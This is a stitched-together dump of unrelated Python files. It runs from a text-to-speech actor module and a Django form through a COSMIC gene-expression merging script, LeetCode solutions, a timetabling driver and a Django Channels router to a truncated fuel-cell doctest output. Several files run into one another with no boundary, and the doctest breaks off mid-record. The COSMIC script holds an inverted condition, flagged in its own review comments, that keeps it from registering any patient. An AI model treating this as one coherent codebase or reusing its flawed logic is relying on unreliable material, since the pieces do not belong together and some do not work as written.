# SPARSE AE
# VAE
|
import sys
import time
import queue
import threading
from playsound import playsound
# Shared work queues: raw text lines in, rendered mp3 file names out.
speechQ = queue.Queue()
lineQ = queue.Queue()
# Possible list of available voices for actors
voiceMap = {'auA':'en-AU-Wavenet-A', 'auB':'en-AU-Wavenet-B', 'auC':'en-AU-Wavenet-C',
            'auD':'en-AU-Wavenet-D', 'gbA':'en-GB-Wavenet-A','gbB':'en-GB-Wavenet-B',
            'gbC':'en-GB-Wavenet-C', 'gbD':'en-GB-Wavenet-D', 'usA':'en-US-Wavenet-A',
            'usB':'en-US-Wavenet-B', 'usC':'en-US-Wavenet-C', 'usD':'en-US-Wavenet-D',
            'usE':'en-US-Wavenet-E', 'usF':'en-US-Wavenet-F'}
class Actor:
    """ An actor for a given play that is designed
    to speak mp3 sound files of lines.
    """
    def __init__(self, actorId=None, voice=None):
        """ Initializer for an actor
        Args:
            actorId: The string name of the actor
            voice: The voice associated with the actor
        """
        global speechQ
        self.speechQ = speechQ
        self.Id = actorId
        self.voice = voice
        self.lineQ = lineQ
        # Background thread that consumes lines from speechQ for this actor.
        self.thread = threading.Thread(target=self.run, name="Actor", args=[])
        self.thread.start()
        self.lineNum = 0  # sequence number used to name the generated mp3 files
    def synthesize_ssml(self, text):
        """Synthesizes speech from the input string of ssml.
        Note: ssml must be well-formed according to:
            https://www.w3.org/TR/speech-synthesis/
        Example: <speak>Hello there.</speak>
        Writes the rendered mp3 to disk and enqueues its file name on lineQ.
        """
        from google.cloud import texttospeech
        client = texttospeech.TextToSpeechClient()
        ssml = "<speak>" + text + "</speak>"
        input_text = texttospeech.types.SynthesisInput(ssml=ssml)
        # Note: the voice can also be specified by name.
        # Names of voices can be retrieved with client.list_voices().
        voice = texttospeech.types.VoiceSelectionParams(
            language_code='en-US',
            ssml_gender=texttospeech.enums.SsmlVoiceGender.MALE,
            name=self.voice)
        # Set the output and speaking rate
        audio_config = texttospeech.types.AudioConfig(
            audio_encoding=texttospeech.enums.AudioEncoding.MP3,
            speaking_rate=0.8)
        response = client.synthesize_speech(input_text, voice, audio_config)
        # The response's audio_content is binary.
        file = "audio_line" + str(self.Id) + str(self.lineNum) + ".mp3"
        with open(file, 'wb') as out:
            out.write(response.audio_content)
        print('Audio content written to file', file)
        self.lineQ.put(file)
        self.lineNum += 1
    def parseText(self, text):
        """ Further parsing done to ensure
        proper breaks in speech given a line:
        sentence ends get the longest pause, then commas, then colons.
        """
        line = ""
        sentiment = 1  # pause multiplier (currently always 1)
        for word in text.split():
            print("word", word)
            if word[-1] == ".":
                word = word + "<break time=\"" + str(
                    700 * sentiment) + "ms\" />"
            elif word[-1] == ",":
                word = word + "<break time=\"450ms\" />"
            elif word[-1] == ":":
                word = word + "<break time=\"250ms\" />"
            word += " "
            line += word
        print("text", text, "line", line)
        return line
    def run(self):
        """ Listening process
        for an actor: consume lines until a ``None`` sentinel arrives.
        """
        while True:
            line = speechQ.get()
            if line is None:
                break
            # Erlang sends strings as lists of character codes; normalize.
            if type(line) is not str:
                line = ''.join(map(chr,line))
            print(f"Actor {self.Id} has picked up line {line}")
            line = self.parseText(line)
            self.synthesize_ssml(line)
def start(actorId, voice):
    """Spawn an Actor instance.
    Args:
        actorId: associated name for the actor (str or Erlang char list)
        voice: Wavenet voice key for the actor
    """
    # Erlang delivers strings as lists of character codes; normalize both.
    if type(actorId) is not str:
        print("Not string")
        actorId = ''.join(map(chr, actorId))
        voice = ''.join(map(chr, voice))
    voice = voiceMap[voice]
    a = Actor(actorId=actorId, voice=voice)
def enqueue(line):
    """Enqueue the first element of an incoming payload for synthesis."""
    print(f"line is {line}")
    speechQ.put(line[0])
def speak():
    """Cue the actor: play back the next rendered audio file."""
    print("Speaking")
    next_file = lineQ.get()
    playsound(next_file)
|
from django import forms
from pagedown.widgets import AdminPagedownWidget
from .models import Post
from taggit.forms import *
class BlogCreationForm(forms.ModelForm):
    """Post creation form with a Markdown (pagedown) editor for the body."""
    # AdminPagedownWidget renders a Markdown editor with live preview.
    content = forms.CharField(widget=AdminPagedownWidget())
    class Meta:
        model = Post
        fields = [
            'content',
            'title',
            'tags'
        ]
|
#setup.py
# Phase-0 setup: file-name templates, counters, and the accumulators used by
# the COSMIC case/expression merging loops below.
import csv
from os import walk
#This is the big datafile
case_file = open("Cases/CaseData1.tsv")
CFILE_FRONT = "Cases/CaseData"
#Gene expression datafile
tsv_file = open("Expression/CosmicCompleteGeneExpression_1.tsv")
EFILE_FRONT = "Expression/CosmicCompleteGeneExpression_"
FILE_EXT = ".tsv"
expression_data = csv.reader(tsv_file, delimiter="\t")
case_data = csv.reader(case_file, delimiter="\t")
collected_data = []
# Number of chunked input files for each data type.
NUM_EFILES = 3242
NUM_CFILES = 176#176
onFile = 1
onEFile = 1
onCFile = 1
onGene = 0
onRow = 0
GENE_NAMES = []
# Column layout of the merged per-patient rows.
FIELDNAMES = ["Gene_name", "Accession Number", "Gene_CDS_length", "HGNC_ID", "Sample_name", "ID_sample", "ID_tumour", "Primary_site", "Site_subtype_1", "Site_subtype_2", "Site_subtype_3", "Primary_histology", "Histology_subtype_1", "Histology_subtype_2", "Histology_subtype_3", "Genome-wide_screen", "GENOMIC_MUTATION_ID", "LEGACY_MUTATION_ID", "MUTATION_ID", "Mutation_CDS", "Mutation_AA", "Mutation_Description", "Mutation_zygosity", "LOH", "GRCh", "Mutation_genome_position", "Mutation_strand", "SNP", "Resistance_Mutation", "FATHMM_prediction", "FATHMM_score", "Mutation_somatic_status", "Pubmed_PMID", "ID_STUDY", "Sample_Type", "Tumour_origin", "Age", "HGVSP", "HGVSC", "HGVSG", "SAMPLE_ID2", "SAMPLE_NAME2", "GENE_NAME2", "REGULATION2", "Z_SCORE2", "ID_STUDY2"]
have_genes = []
numGenes = -1
#geneNames = {"NULL": -1}
genes = {}
genesTemp = []
# Per-patient output directory and bookkeeping maps.
outPath = "allPatients"
patient_data = {}
patients = []
patientFiles = {}
def addToFile(file, row):
    """Append ``row`` to the open TSV ``file``, mapping columns positionally
    onto the module-level FIELDNAMES header."""
    writer = csv.DictWriter(file, fieldnames=FIELDNAMES, delimiter='\t')
    record = {FIELDNAMES[col]: value for col, value in enumerate(row)}
    writer.writerow(record)
# Pass 1 over the chunked case files: register patients and open one
# output file per patient name (column 4 = Sample_name).
while onCFile <= NUM_CFILES:
    print ("***********" + str(onCFile) + "***********")
    case_file = open("Cases/CaseData" + str(onCFile) + ".tsv")
    case_data = csv.reader(case_file, delimiter="\t")
    onCFile += 1
    for c_row in case_data:
        #if "TP53" in c_row[0]:
        #pN = c_row[20]
        #print(c_row[20])
        #tempPat = "p." + pattern
        # NOTE(review): ``patients`` starts empty and is only appended inside
        # this membership check, so the branch can never fire and no patient
        # is ever registered — the condition looks inverted; confirm intent.
        if c_row[4] in patients:
            #print("Pattern Found")
            temp = [c_row]
            patients.append(c_row[4])
            patient_data.update({c_row[4]: temp})
            f = open(outPath + "/" + c_row[4] +".tsv", "w+")
            patientFiles.update({c_row[4]: f})
    case_file.close()
    #print(patient_data)
    pass
#READ EXPRESSION DATA
# Pass 2: append matching expression rows (column 1 = sample name) to each
# registered patient's file, chunk by chunk.
while onEFile <= NUM_EFILES:
    print ("~~~~~~~~~~~" + str(onEFile) + "~~~~~~~~~~~")
    # Re-open every patient file in append mode for this chunk.
    for p in patients:
        patientFiles[p] = open(patientFiles[p].name, "a")
    tsv_file = open(EFILE_FRONT + str(onEFile) + ".tsv")
    onEFile += 1
    expression_data = csv.reader(tsv_file, delimiter="\t")
    for e_row in expression_data:
        if e_row[1] in patient_data:
            addToFile(patientFiles[e_row[1]], e_row)
            pass
    for p in patients:
        patientFiles[p].close()
    pass
print (patientFiles)
# Pass 3: re-scan the case files and append matching mutation rows.
onCFile = 1
while onCFile <= NUM_CFILES:
    print ("***********" + str(onCFile) + "***********")
    case_file = open("Cases/CaseData" + str(onCFile) + ".tsv")
    case_data = csv.reader(case_file, delimiter="\t")
    onCFile += 1
    for p in patients:
        patientFiles[p] = open(patientFiles[p].name, "a")
        if onCFile == 2:
            pass
            #addToFile(patientFiles[p], FIELDNAMES)
    for c_row in case_data:
        if c_row[4] in patients:
            addToFile(patientFiles[c_row[4]], c_row)
    for p in patients:
        patientFiles[p].close()
    #print(patient_data)
    pass
#######################################################################
#.....................................................................#
#....................SEPARATE FILES...................................#
#.....................................................................#
#######################################################################
# Second phase: split each merged per-patient TSV into an expression (.gx)
# file and a mutation (.mu) file.
filepath = outPath
out_path = "e/"    # destination for expression (.gx) files
out_path_2 = "m/"  # destination for mutation (.mu) files
original_files = []
# Column layout of the .gx expression rows.
FIELDNAMES = ["COSMIC ID", "TCGA ID", "GENE", "EXPRESSION", "Z VALUE", "?"]
FIELDNAMES2 = ["Gene_name", "Accession Number", "Gene_CDS_length", "HGNC_ID", "Sample_name", "ID_sample", "ID_tumour", "Primary_site", "Site_subtype_1", "Site_subtype_2", "Site_subtype_3", "Primary_histology", "Histology_subtype_1", "Histology_subtype_2", "Histology_subtype_3", "Genome-wide_screen", "GENOMIC_MUTATION_ID", "LEGACY_MUTATION_ID", "MUTATION_ID", "Mutation_CDS", "Mutation_AA", "Mutation_Description", "Mutation_zygosity", "LOH", "GRCh", "Mutation_genome_position", "Mutation_strand", "SNP", "Resistance_Mutation", "FATHMM_prediction", "FATHMM_score", "Mutation_somatic_status", "Pubmed_PMID", "ID_STUDY", "Sample_Type", "Tumour_origin", "Age", "HGVSP", "HGVSC", "HGVSG", "SAMPLE_ID2", "SAMPLE_NAME2", "GENE_NAME2", "REGULATION2", "Z_SCORE2", "ID_STUDY2"]
# Collect only the top-level file names of the patient directory.
for (dirpath, dirnames, filenames) in walk(filepath):
    original_files.extend(filenames)
    break
# For each merged per-patient TSV, split the rows into an expression (.gx)
# file and a mutation (.mu) file.
for n in original_files:
    og_file = open(filepath + "/" + n)
    expression_file = open(out_path + n[:len(n)-4] + ".gx.tsv", "w+")
    og_data = csv.reader(og_file, delimiter="\t")
    nonNormalExpression = []
    mutData = []
    for row in og_data:
        # Rows keyed by the patient name (or the header row) are mutation rows.
        if row == [] or row[4] == n[:len(n)-4] or row[4] == "Sample_name":
            mutData.append(row[:])
        elif row[3] != "normal":
            r = row[:]
            # Tag the gene name with a regulation direction marker.
            # NOTE(review): "+" is appended when regulation is NOT "over" —
            # this looks inverted; confirm the intended meaning of +/-.
            if r[3] != "over":
                r[2] = r[2] + "+"
            else:
                r[2] = r[2] + "-"
            nonNormalExpression.append(r[:])
        else:
            # BUG FIX: the original appended ``r[:]`` here, re-appending a
            # stale copy of the previous non-normal row (and raising
            # NameError when the first data row was "normal"). Append the
            # current row instead.
            nonNormalExpression.append(row[:])
    # Write the expression (.gx) file: only the first six columns are kept.
    writer = csv.DictWriter(expression_file, fieldnames=FIELDNAMES, delimiter='\t')
    for r in nonNormalExpression:
        tempRowDict = {}
        for k in range(len(r)):
            if k > 5:
                break
            tempRowDict.update({FIELDNAMES[k]: r[k]})
        writer.writerow(tempRowDict)
    expression_file.close()
    og_file.close()
    # Write the mutation (.mu) file with the full column layout.
    mutation_file = open(out_path_2 + n[:len(n)-4] + ".mu.tsv", "w+")
    writer = csv.DictWriter(mutation_file, fieldnames=FIELDNAMES2, delimiter='\t')
    for r in mutData:
        tempRowDict = {}
        for k in range(len(r)):
            tempRowDict.update({FIELDNAMES2[k]: r[k]})
        writer.writerow(tempRowDict)
    mutation_file.close()
|
'''
Given a binary tree, find the lowest common ancestor (LCA) of two given nodes in the tree.
According to the definition of LCA on Wikipedia: The lowest common ancestor is defined between two nodes p and q as the lowest node in T that has both p and q as descendants (where we allow a node to be a descendant of itself)
Given the following binary tree: root = [3,5,1,6,2,0,8,null,null,7,4]
_______3______
/ \
___5__ ___1__
/ \ / \
6 _2 0 8
/ \
7 4
Example 1:
Input: root = [3,5,1,6,2,0,8,null,null,7,4], p = 5, q = 1
Output: 3
Explanation: The LCA of nodes 5 and 1 is 3.
Example 2:
Input: root = [3,5,1,6,2,0,8,null,null,7,4], p = 5, q = 4
Output: 5
Explanation: The LCA of nodes 5 and 4 is 5, since a node can be a descendant of itself
according to the LCA definition.
Note:
All of the nodes' values will be unique.
p and q are different and both values will exist in the binary tree
'''
import copy
# Definition for a binary tree node.
class TreeNode(object):
    """A single node of a binary tree."""
    def __init__(self, x):
        # value payload; both children start detached
        self.val = x
        self.left = None
        self.right = None
class Solution(object):
    def lowestCommonAncestor(self, root, p, q):
        """
        :type root: TreeNode
        :type p: TreeNode
        :type q: TreeNode
        :rtype: TreeNode
        Strategy: record the root-to-node path for p and for q, then walk
        both paths in lockstep; the last shared node is the LCA.
        """
        if root == None:
            return None
        ok,pseq = self.dfs(root,[],p)
        ok,qseq = self.dfs(root,[],q)
        # Make pseq the shorter path so the lockstep scan stays in bounds.
        if len(pseq)>len(qseq):
            pseq,qseq=qseq,pseq
        for i in range (1,len(pseq)):
            if pseq[i]!=qseq[i]:
                return pseq[i-1]
        # The shorter path is a prefix of the longer one: its endpoint is an
        # ancestor of the other node and therefore the LCA.
        if len(qseq)>len(pseq):
            return qseq[len(pseq)-1]
        return None
    def dfs(self,root,seq,target):
        # Depth-first search accumulating the current path in ``seq``;
        # returns (found, snapshot-of-path).
        if root == None:
            return False,None
        seq.append(root)
        if root == target:
            # Unlike Go there are no pointers here: the path must be copied
            # on return, since ``seq`` keeps mutating as the recursion
            # unwinds; the copy cannot travel back through the argument.
            return True,copy.copy(seq)
        ok,ans = self.dfs(root.left,seq,target)
        if ok:
            return True,ans
        ok,ans = self.dfs(root.right,seq,target)
        if ok:
            return True,ans
        # Backtrack: drop the last node. (Unlike Go slices, shrinking needs an
        # explicit call; remove() deletes the first equal element, which is
        # safe here because all node values are unique.)
        seq.remove(seq[-1])
        return False,None
# Python 2 demo of list mutation, slicing, and parameter-rebinding semantics.
s = [1,2,3,4,5,6]
s.append(99)
s.append(98)
s = s[:-1]  # slicing copies: drops the trailing 98
s[1]=10
print s,s
def modifyseq(seq,seq2):
    # Rebinding a parameter only changes the local name; the caller's object
    # is untouched (the IDE flags seq2 as an unused local variable).
    seq2 = copy.copy(seq)
x = []
modifyseq(s,x)
print x  # still [] — the rebinding inside modifyseq did not propagate
from Population import Population
from Data import Reader
# Driver script: run one generation of the evolutionary timetabling search,
# then the perturbative-heuristic and GHP evaluation phases.
# Fixed seed so runs are reproducible.
seed = 1
data = Reader()
# Index of the problem instance to solve (the first one in the data set).
num_problem = 0
# NOTE(review): the 3, 5, 10, 10 arguments are positional tuning constants
# whose meaning is defined by Population's constructor — confirm there.
population = Population(seed, 3, 5, data.problems, data.rooms[num_problem], data.courses[num_problem], data.days[num_problem], data.curricula[num_problem], data.periods_per_day[num_problem], data.num_rooms[num_problem], 10, 10)
count = 0
# Effectively a single call to nextGeneration(); raise the bound on count
# to evolve for more generations.
while count < 1:
    population.nextGeneration()
    count = count + 1
print(" ----- GENERATION PHASE COMPLETED ----- ")
population.evolvePerturbativeHeuristic()
population.createForGHP(1)
population.evaluateGHP()
# num_permutations = 20
# for i in range(0, num_permutations):
#     population.hillClimb()
|
'''
Technique of negation is used here: as we move through the array, we negate the number present at the
index corresponding to the current value, and then return index+1 for every position that still holds
a positive number after traversing the array
'''
def finidingdisappearednumbers(self, nums):
    """
    Return all values in [1, len(nums)] that are missing from nums,
    assuming every element of nums lies in that range (LeetCode 448).

    Presence is marked in place by negating nums[v - 1] for each value v
    seen; any index left positive corresponds to a missing value.
    O(n) time, O(1) extra space; nums is mutated.

    BUG FIX: the original indexed with abs(nums[i]) (1-based value used
    as a 0-based index), which raises IndexError whenever the value
    len(nums) appears and marks the wrong slots otherwise; the index
    must be abs(nums[i]) - 1.
    """
    for i in range(len(nums)):
        # abs() undoes any negation already applied to this slot.
        index = abs(nums[i]) - 1
        nums[index] = -abs(nums[index])
    return [i + 1 for i in range(len(nums)) if nums[i] > 0]
from django.conf.urls import url
from django.urls import path
from channels.routing import ProtocolTypeRouter, URLRouter, ChannelNameRouter
from channels.auth import AuthMiddlewareStack
from channels.security.websocket import AllowedHostsOriginValidator, OriginValidator
from game.consumers import GameConsumer
# ASGI entry point: dispatch incoming connections by protocol type.
# HTTP falls through to Django's default handling; only websockets are
# routed here.
application = ProtocolTypeRouter({
    # Empty for now
    # Reject cross-origin websocket handshakes (AllowedHostsOriginValidator),
    # then attach the session-authenticated user to the scope
    # (AuthMiddlewareStack) before URL dispatch.
    'websocket': AllowedHostsOriginValidator(
        AuthMiddlewareStack(
            URLRouter(
                [
                    #url(r"", GameConsumer, name='game-consumer')
                    # NOTE(review): Channels 3+ requires GameConsumer.as_asgi()
                    # here — confirm which channels version is installed.
                    path('<int:game_id>/details/', GameConsumer, name='game-detail-consumer'),
                    #path('about/', views.about, name='game-about'),
                    #path('', views.home, name='game-home'),
                    #path('<int:game_id>/next/', views.game_next, name='game-next'),
                    #path('<int:game_id>/pick/', views.pick, name='game-pick'),
                    #path('<int:game_id>/join/', views.join, name='game-join'),
                    #path('<int:game_id>/ready/', views.ready, name='game-ready'),
                ]
            )
        ),
    ),
    # NOTE: this part needs to change (translated from Turkish original)
    #'channel': ChannelNameRouter({
    #    'task': TaskConsumer
    #})
})
# -*- coding: utf-8 -*-
'''
>>> from opem.Dynamic.Padulles_Amphlett import *
>>> import shutil
>>> Test_Vector={"A":50.6,"l":0.0178,"lambda":23,"JMax":1.5,"T":343,"N0":5,"KO2":0.0000211,"KH2":0.0000422,"KH2O":0.000007716,"tH2":3.37,"tO2":6.74,"t1":2,"t2":2,"tH2O":18.418,"B":0.016,"rho":1.168,"qMethanol":0.0002,"CV":2,"i-start":0.1,"i-stop":4,"i-step":0.1,"Name":"Test"}
>>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod=Test_Vector, TestMode=True)
###########
Padulles-Amphlett-Model Simulation
###########
Analyzing . . .
I : 0.1
E : 6.0684154992732005 V
Eta Activation : 0.18557231242539243 V
Eta Concentration : 2.109426805213159e-05 V
Eta Ohmic : 0.00017548304819292376 V
FC Efficiency : 0.6589193654570529
FC Power : 0.5139571050565013 W
FC Voltage : 5.139571050565013 V
Loss : 0.1857688897416375 V
PH2 : 0.19717074233280188 atm
PH2O : 0.2426831613626925 atm
PO2 : 0.1906263686382979 atm
Power-Thermal : 0.10104289494349877 W
###########
I : 0.2
E : 6.068413961701556 V
Eta Activation : 0.23146009851376736 V
Eta Concentration : 4.221638333089875e-05 V
Eta Ohmic : 0.0003510800160998837 V
FC Efficiency : 0.629377818863534
FC Power : 0.9818293974271133 W
FC Voltage : 4.909146987135566 V
Loss : 0.23185339491319815 V
PH2 : 0.1971566919511875 atm
PH2O : 0.24266586776736396 atm
PO2 : 0.1906184358000996 atm
Power-Thermal : 0.2481706025728869 W
###########
I : 0.3
E : 6.068412424065923 V
Eta Activation : 0.2583036192079603 V
Eta Concentration : 6.336641945755048e-05 V
Eta Ohmic : 0.0005267910327125488 V
FC Efficiency : 0.6120440436878553
FC Power : 1.4321830622295815 W
FC Voltage : 4.773943540765272 V
Loss : 0.25889377666013036 V
PH2 : 0.19714264156957312 atm
PH2O : 0.24264857417203542 atm
PO2 : 0.1906105029619013 atm
Power-Thermal : 0.41281693777041856 W
###########
I : 0.4
E : 6.068410886366294 V
Eta Activation : 0.27735002084480426 V
Eta Concentration : 8.454445034568427e-05 V
Eta Ohmic : 0.0007026162388380664 V
FC Efficiency : 0.5997083306020967
FC Power : 1.871089991478542 W
FC Voltage : 4.677724978696355 V
Loss : 0.278137181533988 V
PH2 : 0.19712859118795872 atm
PH2O : 0.24263128057670688 atm
PO2 : 0.19060257012370302 atm
Power-Thermal : 0.5889100085214584 W
###########
I : 0.5
E : 6.068409348602667 V
Eta Activation : 0.2921240370409447 V
Eta Concentration : 0.00010575055020278165 V
Eta Ohmic : 0.0008785557847524419 V
FC Efficiency : 0.5901112348363035
FC Power : 2.3014338158615835 W
FC Voltage : 4.602867631723167 V
Loss : 0.2931083433758999 V
PH2 : 0.19711454080634436 atm
PH2O : 0.24261398698137834 atm
PO2 : 0.1905946372855047 atm
Power-Thermal : 0.7735661841384167 W
###########
I : 0.6
E : 6.0684078107750326 V
Eta Activation : 0.3041956781419353 V
Eta Concentration : 0.00012698479353178086 V
Eta Ohmic : 0.0010546098289093816 V
FC Efficiency : 0.582246339352968
FC Power : 2.72491286817189 W
FC Voltage : 4.54152144695315 V
Loss : 0.3053772727643765 V
PH2 : 0.19710049042472996 atm
PH2O : 0.2425966933860498 atm
PO2 : 0.1905867044473064 atm
Power-Thermal : 0.9650871318281099 W
###########
I : 0.7
E : 6.068406272883388 V
Eta Activation : 0.31440243547871893 V
Eta Concentration : 0.000148247255132642 V
Eta Ohmic : 0.0012307785370829418 V
FC Efficiency : 0.5755767905806046
FC Power : 3.142649276570101 W
FC Voltage : 4.489498966528716 V
Loss : 0.3157814612709345 V
PH2 : 0.19708644004311557 atm
PH2O : 0.24257939979072127 atm
PO2 : 0.19057877160910808 atm
Power-Thermal : 1.162350723429899 W
###########
I : 0.8
E : 6.068404734927729 V
Eta Activation : 0.3232442167420945 V
Eta Concentration : 0.00016953801010392253 V
Eta Ohmic : 0.0014070620817435461 V
FC Efficiency : 0.5697821347125663
FC Power : 3.555440520606415 W
FC Voltage : 4.444300650758018 V
Loss : 0.32482081683394204 V
PH2 : 0.19707238966150117 atm
PH2O : 0.24256210619539273 atm
PO2 : 0.1905708387709098 atm
Power-Thermal : 1.3645594793935858 W
###########
I : 0.9
E : 6.068403196908046 V
Eta Activation : 0.3310434726426763 V
Eta Concentration : 0.00019085713384438152 V
Eta Ohmic : 0.0015834606415773538 V
FC Efficiency : 0.564655672412507
FC Power : 3.9638828203358005 W
FC Voltage : 4.404314244817556 V
Loss : 0.332817790418098 V
PH2 : 0.19705833927988675 atm
PH2O : 0.24254481260006414 atm
PO2 : 0.19056290593271147 atm
Power-Thermal : 1.5711171796642 W
###########
I : 1.0
E : 6.068401658824337 V
Eta Activation : 0.33802037026202836 V
Eta Concentration : 0.00021220470205456714 V
Eta Ohmic : 0.0017599744011013664 V
FC Efficiency : 0.5600562707690275
FC Power : 4.368438911998416 W
FC Voltage : 4.368438911998416 V
Loss : 0.3399925493651843 V
PH2 : 0.19704428889827239 atm
PH2O : 0.2425275190047356 atm
PO2 : 0.1905549730945132 atm
Power-Thermal : 1.7815610880015846 W
###########
I : 1.1
E : 6.068400120676597 V
Eta Activation : 0.3443319458183834 V
Eta Concentration : 0.0002335807907384422 V
Eta Ohmic : 0.0019366035503462617 V
FC Efficiency : 0.5558832653691355
FC Power : 4.769478416867183 W
FC Voltage : 4.335889469879257 V
Loss : 0.34650213015946807 V
PH2 : 0.197030238516658 atm
PH2O : 0.24251022540940706 atm
PO2 : 0.19054704025631486 atm
Power-Thermal : 1.9955215831328177 W
###########
I : 1.2
E : 6.068398582464819 V
Eta Activation : 0.35009414904739194 V
Eta Concentration : 0.00025498547620500224 V
Eta Ohmic : 0.002113348284589288 V
FC Efficiency : 0.5520623292851136
FC Power : 5.167303402108664 W
FC Voltage : 4.306086168423887 V
Loss : 0.35246248280818626 V
PH2 : 0.1970161881350436 atm
PH2O : 0.24249293181407852 atm
PO2 : 0.19053910741811658 atm
Power-Thermal : 2.212696597891336 W
###########
I : 1.3
E : 6.068397044188998 V
Eta Activation : 0.35539503345654255 V
Eta Concentration : 0.0002764188350699048 V
Eta Ohmic : 0.0022902088041253615 V
FC Efficiency : 0.548537017783373
FC Power : 5.562165360323403 W
FC Voltage : 4.27858873871031 V
Loss : 0.3579616610957378 V
PH2 : 0.19700213775342923 atm
PH2O : 0.24247563821874998 atm
PO2 : 0.19053117457991825 atm
Power-Thermal : 2.4328346396765976 W
###########
I : 1.4
E : 6.06839550584913 V
Eta Activation : 0.36030304442922906 V
Eta Concentration : 0.00029788094425712723 V
Eta Ohmic : 0.0024671853140681515 V
FC Efficiency : 0.5452634554373536
FC Power : 5.954276933375901 W
FC Voltage : 4.253054952411358 V
Loss : 0.36306811068755435 V
PH2 : 0.19698808737181484 atm
PH2O : 0.24245834462342142 atm
PO2 : 0.19052324174171997 atm
Power-Thermal : 2.6557230666240987 W
###########
I : 1.5
E : 6.068393967445208 V
Eta Activation : 0.3648724409731032 V
Eta Concentration : 0.00031937188100060893 V
Eta Ohmic : 0.002644278024175193 V
FC Efficiency : 0.5422068606479247
FC Power : 6.343820269580719 W
FC Voltage : 4.229213513053812 V
Loss : 0.367836090878279 V
PH2 : 0.19697403699020044 atm
PH2O : 0.24244105102809288 atm
PO2 : 0.19051530890352164 atm
Power-Thermal : 2.881179730419282 W
###########
I : 1.6
E : 6.068392428977227 V
Eta Activation : 0.36914696409844006 V
Eta Concentration : 0.0003408917228459314 V
Eta Ohmic : 0.0028214871486926026 V
FC Efficiency : 0.539339194118889
FC Power : 6.7309531426037355 W
FC Voltage : 4.2068457141273345 V
Loss : 0.3723093429699786 V
PH2 : 0.19695998660858605 atm
PH2O : 0.24242375743276434 atm
PO2 : 0.19050737606532336 atm
Power-Thermal : 3.1090468573962653 W
###########
I : 1.7
E : 6.068390890445182 V
Eta Activation : 0.3731623911228729 V
Eta Concentration : 0.00036244054765199196 V
Eta Ohmic : 0.0029988129062160497 V
FC Efficiency : 0.5366375214822406
FC Power : 7.115813534854511 W
FC Voltage : 4.185772667561477 V
Loss : 0.376523644576741 V
PH2 : 0.19694593622697168 atm
PH2O : 0.2424064638374358 atm
PO2 : 0.19049944322712503 atm
Power-Thermal : 3.339186465145489 W
###########
I : 1.8
E : 6.068389351849069 V
Eta Activation : 0.3769483587657406 V
Eta Concentration : 0.00038401843359268825 V
Eta Ohmic : 0.003176255519565377 V
FC Efficiency : 0.5340828446480225
FC Power : 7.4985231388582365 W
FC Voltage : 4.165846188254576 V
Loss : 0.3805086327188987 V
PH2 : 0.19693188584535729 atm
PH2O : 0.24238917024210727 atm
PO2 : 0.19049151038892673 atm
Power-Thermal : 3.5714768611417647 W
###########
I : 1.9
E : 6.068387813188879 V
Eta Activation : 0.38052969267197334 V
Eta Concentration : 0.00040562545915863245 V
Eta Ohmic : 0.0033538152156708046 V
FC Efficiency : 0.5316592495454955
FC Power : 7.8791900782642434 W
FC Voltage : 4.146942146454865 V
Loss : 0.38428913334680276 V
PH2 : 0.1969178354637429 atm
PH2O : 0.24237187664677873 atm
PO2 : 0.19048357755072845 atm
Power-Thermal : 3.8058099217357566 W
###########
I : 2.0
E : 6.0683862744646095 V
Eta Activation : 0.3839273955127959 V
Eta Concentration : 0.0004272617031588504 V
Eta Ohmic : 0.003531492225469087 V
FC Efficiency : 0.5293532727253193
FC Power : 8.257911054514981 W
FC Voltage : 4.1289555272574905 V
Loss : 0.3878861494414239 V
PH2 : 0.19690378508212852 atm
PH2O : 0.2423545830514502 atm
PO2 : 0.19047564471253012 atm
Power-Thermal : 4.04208894548502 W
###########
I : 2.1
E : 6.068384735676256 V
Eta Activation : 0.38715939375662295 V
Eta Concentration : 0.00044892724472251814 V
Eta Ohmic : 0.0037092867838082735 V
FC Efficiency : 0.5271534226603188
FC Power : 8.634773063176024 W
FC Voltage : 4.1117966967504875 V
Loss : 0.39131760778515373 V
PH2 : 0.19688973470051413 atm
PH2O : 0.24233728945612165 atm
PO2 : 0.19046771187433184 atm
Power-Thermal : 4.280226936823977 W
###########
I : 2.2
E : 6.068383196823811 V
Eta Activation : 0.39024111055794025 V
Eta Concentration : 0.00047062216330069346 V
Eta Ohmic : 0.0038871991293599716 V
FC Efficiency : 0.5250498125090778
FC Power : 9.009854782655777 W
FC Voltage : 4.095388537570807 V
Loss : 0.3945989318506009 V
PH2 : 0.19687568431889974 atm
PH2O : 0.2423199958607931 atm
PO2 : 0.1904597790361335 atm
Power-Thermal : 4.520145217344226 W
###########
I : 2.3
E : 6.068381657907269 V
Eta Activation : 0.39318591119501267 V
Eta Concentration : 0.0004923465386680586 V
Eta Ohmic : 0.004065229504538212 V
FC Efficiency : 0.5230338745789967
FC Power : 9.383227709947201 W
FC Voltage : 4.0796642217161745 V
Loss : 0.3977434872382189 V
PH2 : 0.19686163393728537 atm
PH2O : 0.24230270226546458 atm
PO2 : 0.19045184619793523 atm
Power-Thermal : 4.761772290052799 W
###########
I : 2.4
E : 6.068380118926627 V
Eta Activation : 0.3960054536369255 V
Eta Concentration : 0.0005141004509246927 V
Eta Ohmic : 0.004243378155424144 V
FC Efficiency : 0.5210981356038789
FC Power : 9.754957098504613 W
FC Voltage : 4.0645654577102555 V
Loss : 0.40076293224327436 V
PH2 : 0.19684758355567097 atm
PH2O : 0.242285408670136 atm
PO2 : 0.1904439133597369 atm
Power-Thermal : 5.005042901495387 W
###########
I : 2.5
E : 6.068378579881878 V
Eta Activation : 0.39870996749954657 V
Eta Concentration : 0.0005358839804978295 V
Eta Ohmic : 0.00442164533169592 V
FC Efficiency : 0.5192360379260482
FC Power : 10.12510273955794 W
FC Voltage : 4.050041095823176 V
Loss : 0.4036674968117403 V
PH2 : 0.19683353317405658 atm
PH2O : 0.24226811507480747 atm
PO2 : 0.19043598052153862 atm
Power-Thermal : 5.24989726044206 W
###########
I : 2.6
E : 6.068377040773017 V
Eta Activation : 0.40130847825734167 V
Eta Concentration : 0.0005576972081436541 V
Eta Ohmic : 0.004600031286563196 V
FC Efficiency : 0.5174417957708685
FC Power : 10.493719618233213 W
FC Voltage : 4.036046007012774 V
Loss : 0.40646620675204853 V
PH2 : 0.19681948279244216 atm
PH2O : 0.2422508214794789 atm
PO2 : 0.1904280476833403 atm
Power-Thermal : 5.4962803817667885 W
###########
I : 2.7
E : 6.068375501600038 V
Eta Activation : 0.4038089891176398 V
Eta Concentration : 0.0005795402149490941 V
Eta Ohmic : 0.004778536276705824 V
FC Efficiency : 0.5157102786607133
